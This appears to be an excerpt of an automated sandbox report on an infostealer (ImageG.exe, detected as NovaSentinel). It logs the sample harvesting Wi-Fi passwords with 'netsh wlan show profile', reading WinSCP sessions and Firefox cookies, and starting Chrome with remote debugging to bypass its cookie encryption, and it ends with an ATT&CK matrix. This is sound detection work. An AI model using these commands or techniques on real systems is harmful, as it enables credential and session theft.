        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\error.jpg VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Overwrites Mozilla Firefox settings
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmpJump to behavior
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected NovaSentinel
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\System32\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Tries to harvest and steal WLAN passwords
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmp-shmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp-shmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite_tmp-walJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite_tmp-walJump to behavior
        Tries to steal communication platform credentials (via file / registry access)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior

        Remote Access Functionality

        barindex
        Attempt to bypass Chrome Application-Bound Encryption
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
        Yara detected NovaSentinel
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts321
        Windows Management Instrumentation        		1
        Scripting        		1
        DLL Side-Loading        		11
        Disable or Modify Tools        		1
        OS Credential Dumping        		1
        Network Service Discovery        		Remote Services1
        Browser Session Hijacking        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Extra Window Memory Injection        		1
        DLL Side-Loading        		1
        Credentials in Registry        		12
        File and Directory Discovery        		Remote Desktop Protocol12
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
